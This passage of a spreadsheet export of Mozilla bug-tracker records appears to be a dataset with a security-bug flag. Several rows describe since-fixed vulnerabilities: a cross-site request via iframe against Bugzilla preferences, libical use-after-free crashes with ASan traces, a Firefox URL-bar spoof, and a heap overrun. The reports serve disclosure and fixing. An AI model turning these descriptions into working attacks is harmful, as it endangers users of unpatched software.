ends up containing the field 'groupset' twice.
First time : line 125 ( push (@bug_fields, 'groupset') )
Second time : line 171 ( string concatenation with 'creation_ts, group_set) ... 
)
Related to this : enter_bug.cgi creates the corresponding select box twice.
First time : line 408
Second time : line 430
I can only read perl code so much, let alone modify it. So I can't
send you a patch.
Hope you can fix it soon.</t>
        </is>
      </c>
      <c r="X3584" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3585">
      <c r="A3585" t="n">
        <v>472362</v>
      </c>
      <c r="B3585" t="inlineStr">
        <is>
          <t>2009-01-06 12:31:19 -0800</t>
        </is>
      </c>
      <c r="C3585" t="inlineStr">
        <is>
          <t>[SECURITY] Malicious attachments can change your user settings (user + email prefs, shared searches)</t>
        </is>
      </c>
      <c r="D3585" t="inlineStr">
        <is>
          <t>2012-10-28 16:53:14 -0700</t>
        </is>
      </c>
      <c r="E3585" t="n">
        <v>1</v>
      </c>
      <c r="F3585" t="n">
        <v>1</v>
      </c>
      <c r="G3585" t="n">
        <v>4</v>
      </c>
      <c r="H3585" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3585" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J3585" t="inlineStr">
        <is>
          <t>User Accounts</t>
        </is>
      </c>
      <c r="K3585" t="inlineStr">
        <is>
          <t>3.3</t>
        </is>
      </c>
      <c r="L3585" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3585" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3585" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3585" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3585" t="inlineStr"/>
      <c r="Q3585" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3585" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3585" t="inlineStr">
        <is>
          <t>Bugzilla 2.22</t>
        </is>
      </c>
      <c r="T3585" t="n">
        <v>1</v>
      </c>
      <c r="U3585" t="n">
        <v>0</v>
      </c>
      <c r="V3585" t="n">
        <v>10</v>
      </c>
      <c r="W3585" t="inlineStr">
        <is>
          <t>If an HTML attachment contains an iframe pointing to userprefs.cgi, it can edit all your user + email prefs as well as your shared searches. userprefs.cgi should be protected by session tokens to prevent this kind of attack. Fortunately, these malicious attachments cannot change your password or your email address as your password is required.</t>
        </is>
      </c>
      <c r="X3585" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3586">
      <c r="A3586" t="n">
        <v>1196618</v>
      </c>
      <c r="B3586" t="inlineStr">
        <is>
          <t>2015-08-19 20:37:25 -0700</t>
        </is>
      </c>
      <c r="C3586" t="inlineStr">
        <is>
          <t>add support for group owners</t>
        </is>
      </c>
      <c r="D3586" t="inlineStr">
        <is>
          <t>2015-09-02 06:13:51 -0700</t>
        </is>
      </c>
      <c r="E3586" t="n">
        <v>1</v>
      </c>
      <c r="F3586" t="n">
        <v>1</v>
      </c>
      <c r="G3586" t="n">
        <v>7</v>
      </c>
      <c r="H3586" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3586" t="inlineStr">
        <is>
          <t>bugzilla.mozilla.org</t>
        </is>
      </c>
      <c r="J3586" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3586" t="inlineStr">
        <is>
          <t>Production</t>
        </is>
      </c>
      <c r="L3586" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3586" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3586" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3586" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3586" t="inlineStr"/>
      <c r="Q3586" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3586" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3586" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3586" t="n">
        <v>1</v>
      </c>
      <c r="U3586" t="n">
        <v>0</v>
      </c>
      <c r="V3586" t="n">
        <v>15</v>
      </c>
      <c r="W3586" t="inlineStr">
        <is>
          <t>for most of the groups on bmo there isn't a clear owner - someone who is ultimately responsible for managing that group's membership, and a point of contact for questions and reports.
- add a new "owner_user_id" field to groups
- nullable but mandatory for all non-system groups (ie. mandatory in editgroups)
- set to nobody@mozilla.org initially
- add a "groups owned" row to editusers, below "product responsibilities"
- update the "group admins" report to show the owner as well as admins</t>
        </is>
      </c>
      <c r="X3586" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3587">
      <c r="A3587" t="n">
        <v>287296</v>
      </c>
      <c r="B3587" t="inlineStr">
        <is>
          <t>2005-03-22 15:41:06 -0800</t>
        </is>
      </c>
      <c r="C3587" t="inlineStr">
        <is>
          <t>bz_get_index_def  doesn't work for multi-column index</t>
        </is>
      </c>
      <c r="D3587" t="inlineStr">
        <is>
          <t>2005-06-14 23:43:03 -0700</t>
        </is>
      </c>
      <c r="E3587" t="n">
        <v>1</v>
      </c>
      <c r="F3587" t="n">
        <v>1</v>
      </c>
      <c r="G3587" t="n">
        <v>4</v>
      </c>
      <c r="H3587" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3587" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J3587" t="inlineStr">
        <is>
          <t>Installation &amp; Upgrading</t>
        </is>
      </c>
      <c r="K3587" t="inlineStr">
        <is>
          <t>2.19.2</t>
        </is>
      </c>
      <c r="L3587" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3587" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3587" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3587" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3587" t="inlineStr">
        <is>
          <t>[fixed by bug 285111]</t>
        </is>
      </c>
      <c r="Q3587" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3587" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3587" t="inlineStr">
        <is>
          <t>Bugzilla 2.20</t>
        </is>
      </c>
      <c r="T3587" t="n">
        <v>1</v>
      </c>
      <c r="U3587" t="n">
        <v>0</v>
      </c>
      <c r="V3587" t="n">
        <v>4</v>
      </c>
      <c r="W3587" t="inlineStr">
        <is>
          <t>bz_get_index_def checks for a field included in an index by looking at the
column 4 of "SHOW INDEX FROM $table"
Column 4 is the name of A FIELD from that table.  It should use column 2 which
is the name of the key.</t>
        </is>
      </c>
      <c r="X3587" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3588">
      <c r="A3588" t="n">
        <v>726856</v>
      </c>
      <c r="B3588" t="inlineStr">
        <is>
          <t>2012-02-13 16:32:16 -0800</t>
        </is>
      </c>
      <c r="C3588" t="inlineStr">
        <is>
          <t>[It's Tabzilla Time] Replace the grey tab with the new interactive white tab (SUMO)</t>
        </is>
      </c>
      <c r="D3588" t="inlineStr">
        <is>
          <t>2012-03-01 14:59:46 -0800</t>
        </is>
      </c>
      <c r="E3588" t="n">
        <v>1</v>
      </c>
      <c r="F3588" t="n">
        <v>1</v>
      </c>
      <c r="G3588" t="n">
        <v>5</v>
      </c>
      <c r="H3588" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3588" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J3588" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3588" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3588" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3588" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3588" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3588" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3588" t="inlineStr">
        <is>
          <t>u=user c=general s=2012.4 p=1</t>
        </is>
      </c>
      <c r="Q3588" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3588" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3588" t="inlineStr">
        <is>
          <t>2012-03-06</t>
        </is>
      </c>
      <c r="T3588" t="n">
        <v>1</v>
      </c>
      <c r="U3588" t="n">
        <v>0</v>
      </c>
      <c r="V3588" t="n">
        <v>9</v>
      </c>
      <c r="W3588" t="inlineStr">
        <is>
          <t>It's time to phase out the gray tab replace it with Tabzilla for en-US sites.
https://github.com/mozilla/tabzilla
Thanks! Please ping with questions!</t>
        </is>
      </c>
      <c r="X3588" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3589">
      <c r="A3589" t="n">
        <v>1275400</v>
      </c>
      <c r="B3589" t="inlineStr">
        <is>
          <t>2016-05-24 21:24:12 -0700</t>
        </is>
      </c>
      <c r="C3589" t="inlineStr">
        <is>
          <t>Handful use-after-free crashes in libical (used in Thunderbird)</t>
        </is>
      </c>
      <c r="D3589" t="inlineStr">
        <is>
          <t>2024-05-30 09:17:34 -0700</t>
        </is>
      </c>
      <c r="E3589" t="n">
        <v>1</v>
      </c>
      <c r="F3589" t="n">
        <v>1</v>
      </c>
      <c r="G3589" t="n">
        <v>2</v>
      </c>
      <c r="H3589" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3589" t="inlineStr">
        <is>
          <t>Calendar</t>
        </is>
      </c>
      <c r="J3589" t="inlineStr">
        <is>
          <t>Internal Components</t>
        </is>
      </c>
      <c r="K3589" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3589" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3589" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3589" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3589" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3589" t="inlineStr"/>
      <c r="Q3589" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3589" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3589" t="inlineStr">
        <is>
          <t>6.2.5</t>
        </is>
      </c>
      <c r="T3589" t="n">
        <v>1</v>
      </c>
      <c r="U3589" t="n">
        <v>0</v>
      </c>
      <c r="V3589" t="n">
        <v>47</v>
      </c>
      <c r="W3589" t="inlineStr">
        <is>
          <t>Created attachment 8756033
Handful of use-after-free crashes in libical
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
Steps to reproduce:
Hello,
After fuzzing libical for a bit (tested against 1.0, 1.0.1 from http://www.citadel.org/doku.php/documentation:featured_projects:libical and from libical git master), I have a small handful of use-after-free crashes, but are likely the same root cause. These might fall under the bug bounty, they might not. Thunderbird does use libical for parsing, however. Let me know if this is an improper place to submit this bug report.
http://mxr.mozilla.org/comm-central/search?string=icalcomponent_as_ical_string&amp;find=%2F&amp;findi=&amp;filter=%5E%5B%5E%5C0%5D*%24&amp;hitlimit=&amp;tree=comm-central
With any of the above mentioned versions, you can go from the root of the project, and make a directory called 'build', then cd to this directory and run cmake to compile with ASan.
cmake -DCMAKE_CXX_FLAGS="-fsanitize=address -fno-omit-frame-pointer" -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" -DCMAKE_CXX_COMPILER="clang++" ..
After compiling, while still in the build directory, the src/test/parser binary should be usable to reproduce my results. Simply pass the file to parse as an argument to the file.
I submitted a brief issue on github for the libical project (https://github.com/libical/libical/issues/235), looking for a secure way to get these files to the devs, but have gotten no response back.
Actual results:
Below is one of the stack traces from ASan. As you can see, the crash is the library for libical.
==2461==ERROR: AddressSanitizer: heap-use-after-free on address 0x60200000ee95 at pc 0x7f89bc50d649 bp 0x7fffb8f9f920 sp 0x7fffb8f9f098
READ of size 1 at 0x60200000ee95 thread T0
    #0 0x7f89bc50d648  (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x60648)
    #1 0x7f89bc50e5a5 in __interceptor_vsnprintf (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x615a5)
    #2 0x7f89bc50e811 in snprintf (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x61811)
    #3 0x7f89bc280b30 in icalreqstattype_as_string_r (/root/libical_asan/build/lib/libical.so.2+0x4fb30)
    #4 0x7f89bc28347b in icalvalue_as_ical_string_r (/root/libical_asan/build/lib/libical.so.2+0x5247b)
    #5 0x7f89bc27208c in icalproperty_as_ical_string_r (/root/libical_asan/build/lib/libical.so.2+0x4108c)
    #6 0x7f89bc268132 in icalcomponent_as_ical_string_r (/root/libical_asan/build/lib/libical.so.2+0x37132)
    #7 0x7f89bc267fd1 in icalcomponent_as_ical_string (/root/libical_asan/build/lib/libical.so.2+0x36fd1)
    #8 0x400cd4 in main (/root/libical_asan/build/src/test/parser+0x400cd4)
    #9 0x7f89bbe87a3f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x20a3f)
    #10 0x400ae8 in _start (/root/libical_asan/build/src/test/parser+0x400ae8)
0x60200000ee95 is located 5 bytes inside of 6-byte region [0x60200000ee90,0x60200000ee96)
freed by thread T0 here:
    #0 0x7f89bc5456aa in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x986aa)
    #1 0x7f89bc26d667 in icalmemory_free_buffer (/root/libical_asan/build/lib/libical.so.2+0x3c667)
    #2 0x7f89bc2710d7 in icalparser_add_line (/root/libical_asan/build/lib/libical.so.2+0x400d7)
    #3 0x400cbd in main (/root/libical_asan/build/src/test/parser+0x400cbd)
    #4 0x7f89bbe87a3f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x20a3f)
previously allocated by thread T0 here:
    #0 0x7f89bc5459aa in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x989aa)
    #1 0x7f89bc26d5d3 in icalmemory_new_buffer (/root/libical_asan/build/lib/libical.so.2+0x3c5d3)
    #2 0x7f89bc26f44c in make_segment (/root/libical_asan/build/lib/libical.so.2+0x3e44c)
    #3 0x7f89bc26f82d in icalparser_get_value (/root/libical_asan/build/lib/libical.so.2+0x3e82d)
    #4 0x7f89bc270eb6 in icalparser_add_line (/root/libical_asan/build/lib/libical.so.2+0x3feb6)
    #5 0x400cbd in main (/root/libical_asan/build/src/test/parser+0x400cbd)
    #6 0x7f89bbe87a3f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x20a3f)
SUMMARY: AddressSanitizer: heap-use-after-free ??:0 ??
Shadow bytes around the buggy address:
  0x0c047fff9d80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9d90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9da0: fa fa fa fa fa fa fa fa fa fa fd fd fa fa fd fd
  0x0c047fff9db0: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fd
  0x0c047fff9dc0: fa fa fd fa fa fa fd fd fa fa fd fa fa fa fd fd
=&gt;0x0c047fff9dd0: fa fa[fd]fa fa fa fd fd fa fa fd fd fa fa fd fd
  0x0c047fff9de0: fa fa fd fa fa fa 00 07 fa fa fd fd fa fa 04 fa
  0x0c047fff9df0: fa fa fd fa fa fa fd fa fa fa fd fd fa fa fd fa
  0x0c047fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9e2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2461==ABORTING
Expected results:
Not crash.
Let me know if the stack traces are insufficient for reproduction.</t>
        </is>
      </c>
      <c r="X3589" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3590">
      <c r="A3590" t="n">
        <v>1255570</v>
      </c>
      <c r="B3590" t="inlineStr">
        <is>
          <t>2016-03-10 12:45:16 -0800</t>
        </is>
      </c>
      <c r="C3590" t="inlineStr">
        <is>
          <t>HTTP(S) URL spoof in location bar</t>
        </is>
      </c>
      <c r="D3590" t="inlineStr">
        <is>
          <t>2017-01-05 09:12:54 -0800</t>
        </is>
      </c>
      <c r="E3590" t="n">
        <v>1</v>
      </c>
      <c r="F3590" t="n">
        <v>1</v>
      </c>
      <c r="G3590" t="n">
        <v>2</v>
      </c>
      <c r="H3590" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3590" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3590" t="inlineStr">
        <is>
          <t>Address Bar</t>
        </is>
      </c>
      <c r="K3590" t="inlineStr">
        <is>
          <t>45 Branch</t>
        </is>
      </c>
      <c r="L3590" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3590" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3590" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3590" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3590" t="inlineStr">
        <is>
          <t>[necko-backlog][adv-main48+]</t>
        </is>
      </c>
      <c r="Q3590" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3590" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3590" t="inlineStr">
        <is>
          <t>Firefox 48</t>
        </is>
      </c>
      <c r="T3590" t="n">
        <v>1</v>
      </c>
      <c r="U3590" t="n">
        <v>0</v>
      </c>
      <c r="V3590" t="n">
        <v>36</v>
      </c>
      <c r="W3590" t="inlineStr">
        <is>
          <t>Created attachment 8729168
testcase.html
User Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36
Steps to reproduce:
Combination of data URI, Unicode characters and frames. 
Spoof is not perfect but good enough to easily fool your mom and dad. 
At least it worked with mine :)
Follow link in testcase file for a simple demo.
Actual results:
Browser navigates to arbitrary website but URL bar shows https://secure.paypal.com/   
Expected results:
At the very least misleading Unicode characters should be detected/escaped and/or a big warning should be displayed.
Note: I'm submitting a similar report to Chromium.</t>
        </is>
      </c>
      <c r="X3590" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3591">
      <c r="A3591" t="n">
        <v>723453</v>
      </c>
      <c r="B3591" t="inlineStr">
        <is>
          <t>2012-02-02 03:28:37 -0800</t>
        </is>
      </c>
      <c r="C3591" t="inlineStr">
        <is>
          <t>Heap overrun (read + write) in nsBMPEncoder::ConvertHostARGBRow</t>
        </is>
      </c>
      <c r="D3591" t="inlineStr">
        <is>
          <t>2012-06-21 17:06:55 -0700</t>
        </is>
      </c>
      <c r="E3591" t="n">
        <v>1</v>
      </c>
      <c r="F3591" t="n">
        <v>1</v>
      </c>
      <c r="G3591" t="n">
        <v>3</v>
      </c>
      <c r="H3591" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3591" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3591" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K3591" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3591" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3591" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3591" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3591" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3591" t="inlineStr">
        <is>
          <t>[sg:vector-critical (gcc)][qa-]</t>
        </is>
      </c>
      <c r="Q3591" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3591" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3591" t="inlineStr">
        <is>
          <t>mozilla13</t>
        </is>
      </c>
      <c r="T3591" t="n">
        <v>1</v>
      </c>
      <c r="U3591" t="n">
        <v>0</v>
      </c>
      <c r="V3591" t="n">
        <v>23</v>
      </c>
      <c r="W3591" t="inlineStr">
        <is>
          <t>x86_64-linux, running on a 16 bit deep vnc server.
TEST_PATH=content/canvas/test/test_toDataURL_alpha.html
(DISPLAY=:1 TEST_PATH=content/canvas/test/test_toDataURL_alpha.html make -C ff-opt mochitest-plain EXTRA_TEST_ARGS='--close-when-done --debugger=vTRUNK --debugger-args="--tool=memcheck --suppressions=/home/sewardj/MOZ/fglrx-supp.supp --suppressions=/home/sewardj/MOZ/moz-supp.supp --error-limit=no --stats=yes --smc-check=all-non-file --trace-children=yes --child-silent-after-fork=yes '--trace-children-skip=/usr/bin/hg,/bin/rm,*/bin/certutil,*/bin/pk12util,*/bin/ssltunnel' --track-origins=no"') 2&gt;&amp;1 | tee spew2-memcheck-1
produces the errors below -- looks like a read-modify-write of an invalid address
Invalid read of size 1
   at 0x808209D: nsBMPEncoder::ConvertHostARGBRow(unsigned char const*, unsigned char*, unsigned int) (nsBMPEncoder.cpp:450)
   by 0x80828CD: nsBMPEncoder::AddImageFrame(unsigned char const*, unsigned int, unsigned int, unsigned int, unsigned int, unsigned int, nsAString_internal const&amp;) (nsBMPEncoder.cpp:228)
   by 0x8081EE9: nsBMPEncoder::InitFromData(unsigned char const*, unsigned int, unsigned int, unsigned int, unsigned int, unsigned int, nsAString_internal const&amp;) (nsBMPEncoder.cpp:107)
   by 0x835111B: nsCanvasRenderingContext2D::GetInputStream(char const*, unsigned short const*, nsIInputStream**) (nsCanvasRenderingContext2D.cpp:1345)
   by 0x83E9C9D: nsHTMLCanvasElement::ExtractData(nsAString_internal const&amp;, nsAString_internal const&amp;, nsIInputStream**, bool&amp;) (nsHTMLCanvasElement.cpp:247)
   by 0x83EA1B2: nsHTMLCanvasElement::ToDataURLImpl(nsAString_internal const&amp;, nsIVariant*, nsAString_internal&amp;) (nsHTMLCanvasElement.cpp:340)
   by 0x88607FA: nsIDOMHTMLCanvasElement_ToDataURL(JSContext*, unsigned int, JS::Value*) (dom_quickstubs.cpp:17910)
   by 0x908D9D6: js::InvokeKernel(JSContext*, js::CallArgs, js::MaybeConstruct) (jscntxtinlines.h:311)
   by 0x908762D: js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) (jsinterp.cpp:2801)
   by 0x908DACC: js::InvokeKernel(JSContext*, js::CallArgs, js::MaybeConstruct) (jsinterp.cpp:537)
   by 0x90554C2: js_fun_apply(JSContext*, unsigned int, JS::Value*) (jsinterp.h:157)
   by 0x908D9D6: js::InvokeKernel(JSContext*, js::CallArgs, js::MaybeConstruct) (jscntxtinlines.h:311)
 Address 0x201e63ac is 0 bytes after a block of size 300 alloc'd
   at 0x4C28223: malloc (vg_replace_malloc.c:263)
   by 0x8082787: nsBMPEncoder::AddImageFrame(unsigned char const*, unsigned int, unsigned int, unsigned int, unsigned int, unsigned int, nsAString_internal const&amp;) (mozalloc.h:309)
   by 0x8081EE9: nsBMPEncoder::InitFromData(unsigned char const*, unsigned int, unsigned int, unsigned int, unsigned int, unsigned int, nsAString_internal const&amp;) (nsBMPEncoder.cpp:107)
   by 0x835111B: nsCanvasRenderingContext2D::GetInputStream(char const*, unsigned short const*, nsIInputStream**) (nsCanvasRenderingContext2D.cpp:1345)
   by 0x83E9C9D: nsHTMLCanvasElement::ExtractData(nsAString_internal const&amp;, nsAString_internal const&amp;, nsIInputStream**, bool&amp;) (nsHTMLCanvasElement.cpp:247)
   by 0x83EA1B2: nsHTMLCanvasElement::ToDataURLImpl(nsAString_internal const&amp;, nsIVariant*, nsAString_internal&amp;) (nsHTMLCanvasElement.cpp:340)
   by 0x88607FA: nsIDOMHTMLCanvasElement_ToDataURL(JSContext*, unsigned int, JS::Value*) (dom_quickstubs.cpp:17910)
   by 0x908D9D6: js::InvokeKernel(JSContext*, js::CallArgs, js::MaybeConstruct) (jscntxtinlines.h:311)
   by 0x908762D: js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) (jsinterp.cpp:2801)
   by 0x908DACC: js::InvokeKernel(JSContext*, js::CallArgs, js::MaybeConstruct) (jsinterp.cpp:537)
   by 0x90554C2: js_fun_apply(JSContext*, unsigned int, JS::Value*) (jsinterp.h:157)
   by 0x908D9D6: js::InvokeKernel(JSContext*, js::CallArgs, js::MaybeConstruct) (jscntxtinlines.h:311)
Invalid write of size 1
   at 0x80820A6: nsBMPEncoder::ConvertHostARGBRow(unsigned char const*, unsigned char*, unsigned int) (nsBMPEncoder.cpp:450)
   by 0x80828CD: nsBMPEncoder::AddImageFrame(unsigned char const*, unsigned int, unsigned int, unsigned int, unsigned int, unsigned int, nsAString_internal const&amp;) (nsBMPEncoder.cpp:228)
   by 0x8081EE9: nsBMPEncoder::InitFromData(unsigned char const*, unsigned int, unsigned int, unsigned int, unsigned int, unsigned int, nsAString_internal const&amp;) (nsBMPEncoder.cpp:107)
   by 0x835111B: nsCanvasRenderingContext2D::GetInputStream(char const*, unsigned short const*, nsIInputStream**) (nsCanvasRenderingContext2D.cpp:1345)
   by 0x83E9C9D: nsHTMLCanvasElement::ExtractData(nsAString_internal const&amp;, nsAString_internal const&amp;, nsIInputStream**, bool&amp;) (nsHTMLCanvasElement.cpp:247)
   by 0x83EA1B2: nsHTMLCanvasElement::ToDataURLImpl(nsAString_internal const&amp;, nsIVariant*, nsAString_internal&amp;) (nsHTMLCanvasElement.cpp:340)
   by 0x88607FA: nsIDOMHTMLCanvasElement_ToDataURL(JSContext*, unsigned int, JS::Value*) (dom_quickstubs.cpp:17910)
   by 0x908D9D6: js::InvokeKernel(JSContext*, js::CallArgs, js::MaybeConstruct) (jscntxtinlines.h:311)
   by 0x908762D: js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) (jsinterp.cpp:2801)
   by 0x908DACC: js::InvokeKernel(JSContext*, js::CallArgs, js::MaybeConstruct) (jsinterp.cpp:537)
   by 0x90554C2: js_fun_apply(JSContext*, unsigned int, JS::Value*) (jsinterp.h:157)
   by 0x908D9D6: js::InvokeKernel(JSContext*, js::CallArgs, js::MaybeConstruct) (jscntxtinlines.h:311)
 Address 0x201e63ac is 0 bytes after a block of size 300 alloc'd
   at 0x4C28223: malloc (vg_replace_malloc.c:263)
   by 0x8082787: nsBMPEncoder::AddImageFrame(unsigned char const*, unsigned int, unsigned int, unsigned int, unsigned int, unsigned int, nsAString_internal const&amp;) (mozalloc.h:309)
   by 0x8081EE9: nsBMPEncoder::InitFromData(unsigned char const*, unsigned int, unsigned int, unsigned int, unsigned int, unsigned int, nsAString_internal const&amp;) (nsBMPEncoder.cpp:107)
   by 0x835111B: nsCanvasRenderingContext2D::GetInputStream(char const*, unsigned short const*, nsIInputStream**) (nsCanvasRenderingContext2D.cpp:1345)
   by 0x83E9C9D: nsHTMLCanvasElement::ExtractData(nsAString_internal const&amp;, nsAString_internal const&amp;, nsIInputStream**, bool&amp;) (nsHTMLCanvasElement.cpp:247)
   by 0x83EA1B2: nsHTMLCanvasElement::ToDataURLImpl(nsAString_internal const&amp;, nsIVariant*, nsAString_internal&amp;) (nsHTMLCanvasElement.cpp:340)
   by 0x88607FA: nsIDOMHTMLCanvasElement_ToDataURL(JSContext*, unsigned int, JS::Value*) (dom_quickstubs.cpp:17910)
   by 0x908D9D6: js::InvokeKernel(JSContext*, js::CallArgs, js::MaybeConstruct) (jscntxtinlines.h:311)
   by 0x908762D: js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) (jsinterp.cpp:2801)
   by 0x908DACC: js::InvokeKernel(JSContext*, js::CallArgs, js::MaybeConstruct) (jsinterp.cpp:537)
   by 0x90554C2: js_fun_apply(JSContext*, unsigned int, JS::Value*) (jsinterp.h:157)
   by 0x908D9D6: js::InvokeKernel(JSContext*, js::CallArgs, js::MaybeConstruct) (jscntxtinlines.h:311)</t>
        </is>
      </c>
      <c r="X3591" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3592">
      <c r="A3592" t="n">
        <v>854619</v>
      </c>
      <c r="B3592" t="inlineStr">
        <is>
          <t>2013-03-25 16:41:56 -0700</t>
        </is>
      </c>
      <c r="C3592" t="inlineStr">
        <is>
          <t>Purchase with carrier billing fails with a 400 if the Price is '0,99'</t>
        </is>
      </c>
      <c r="D3592" t="inlineStr">
        <is>
          <t>2013-06-26 08:18:10 -0700</t>
        </is>
      </c>
      <c r="E3592" t="n">
        <v>1</v>
      </c>
      <c r="F3592" t="n">
        <v>1</v>
      </c>
      <c r="G3592" t="n">
        <v>6</v>
      </c>
      <c r="H3592" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3592" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J3592" t="inlineStr">
        <is>
          <t>Payments/Refunds</t>
        </is>
      </c>
      <c r="K3592" t="inlineStr">
        <is>
          <t>1.2</t>
        </is>
      </c>
      <c r="L3592" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3592" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3592" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
